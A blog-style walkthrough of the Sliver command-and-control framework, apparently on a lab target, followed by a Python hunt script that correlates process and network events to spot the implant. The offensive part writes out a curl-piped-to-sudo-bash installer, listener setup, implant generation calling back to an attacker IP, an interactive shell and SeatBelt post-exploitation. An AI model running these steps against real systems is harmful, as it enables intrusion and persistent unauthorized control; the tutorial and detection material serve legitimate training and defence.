Introduction
Sliver is an open source, cross-platform command and control (C2) framework released in 2020 by BishopFox. Developed to provide a robust alternative to traditional penetration testing tools, Sliver C2 offers a unique suite of capabilities that supports dynamic interaction with compromised systems. It is built to evade detection and includes features such as multi-platform support, encrypted communications, and the ability to generate modular implants.
Download
In this post, I will use Kali Linux, but you can totally follow along if you use another Linux distro.
Their GitHub repository provides a one-liner to install Sliver:
$ curl https://sliver.sh/install | sudo bash
Confirm the installation was successful by running the command:
$ sliver
If you have problems starting Sliver, you can restart it by running the command:
$ sudo systemctl restart sliver
Then, try running Sliver again.
Usage
Today, we will cover only the basic usage of Sliver. If you want more details or advanced features, you can check their documentation.
Setting up the listener
Here, 10.10.14.16 is my attacker IP.
I created a listener on port 443. I recommend using common ports because there’s a better chance that the connection will be allowed by the firewall.
sliver > mtls --lport 443
You can verify that your listener is running:
sliver > jobs
Generating the Implant and using it
My target IP is 10.129.165.176.
In my scenario, I have a reverse shell on my target by exploiting a service, but I will use Sliver to add persistence.
First, I generate the implant; this will be an .exe file:
sliver > generate --mtls 10.10.14.16:443 --os Windows --arch 64
Here you can see the implant is generated in my Desktop folder as SIGNIFICANT_SUSPENDERS.EXE.
I import SIGNIFICANT_SUSPENDERS.EXE into the target and run it.
I get a connection back to Sliver. By running sessions, I can see the information and the ID:
sliver > sessions
To interact with the implant use:
sliver > use <ID>
You can get more information about the commands you can use by running the help command.
For example, the command shell will give you an interactive shell:
sliver (SIGNIFICANT_SUSPENDERS) > shell
You can run post-exploitation tools such as Rubeus / SeatBelt and many others. You can see more at https://sliver.sh/docs?name=Armory
I will demonstrate with SeatBelt:
sliver (SIGNIFICANT_SUSPENDERS) > armory install seatbelt
You can now use SeatBelt:
sliver (SIGNIFICANT_SUSPENDERS) > seatbelt -group=all
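From the defender's side, the walkthrough above leaves signals that can be correlated: an executable with a two-word uppercase name such as SIGNIFICANT_SUSPENDERS.EXE, and an outbound connection from that process to the listener on port 443. The hunt below is an added example, not code from the original post or from the Sliver project. The event field names, the sample records, the path list and the scoring threshold are all constructed assumptions, and the name pattern only matches files that keep a name of that shape.

```python
import ntpath
import re

# Heuristic (assumption): the implant keeps a two-word uppercase name,
# like SIGNIFICANT_SUSPENDERS.EXE above. A renamed file will not match.
CODENAME_RE = re.compile(r"^[A-Z]{3,}_[A-Z]{3,}\.[Ee][Xx][Ee]$")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")
# Constructed sample telemetry, loosely modelled on Sysmon Event ID 1
# (process creation) and ID 3 (network connection). Field names are assumed.
EVENTS = [
    {"id": 1, "host": "WS01", "pid": 4120, "image": r"C:\Users\Public\SIGNIFICANT_SUSPENDERS.EXE"},
    {"id": 3, "host": "WS01", "pid": 4120, "dst_ip": "10.10.14.16", "dst_port": 443},
    {"id": 1, "host": "WS01", "pid": 880, "image": r"C:\Windows\System32\svchost.exe"},
    {"id": 3, "host": "WS01", "pid": 880, "dst_ip": "203.0.113.7", "dst_port": 443},
    {"id": 1, "host": "WS02", "pid": 2300, "image": r"C:\Program Files\Vendor\BACKUP_AGENT.EXE"},
]

def score_process(image, connections):
    """Return (score, reasons) for one process and its outbound connections."""
    reasons = []
    if CODENAME_RE.match(ntpath.basename(image)):
        reasons.append("two-word uppercase file name")
    if any(part in image.lower() for part in USER_WRITABLE):
        reasons.append("runs from a user-writable path")
    if any(c["dst_port"] == 443 for c in connections):
        reasons.append("outbound connection to tcp/443")
    return len(reasons), reasons

def hunt(events, threshold=3):
    """Correlate process and network events per (host, pid); keep high scores."""
    procs, conns = {}, {}
    for ev in events:
        key = (ev["host"], ev["pid"])
        if ev["id"] == 1:
            procs[key] = ev["image"]
        elif ev["id"] == 3:
            conns.setdefault(key, []).append(ev)
    findings = []
    for (host, pid), image in procs.items():
        net = conns.get((host, pid), [])
        score, reasons = score_process(image, net)
        if score >= threshold:
            findings.append({"host": host, "pid": pid, "image": image,
                             "dst": sorted({c["dst_ip"] for c in net}), "reasons": reasons})
    return findings

if __name__ == "__main__":
    print(hunt(EVENTS))
```

Each signal on its own is noisy (svchost.exe talks to port 443, and a legitimate BACKUP_AGENT.EXE matches the name pattern), which is why the hunt only reports a process when all three line up.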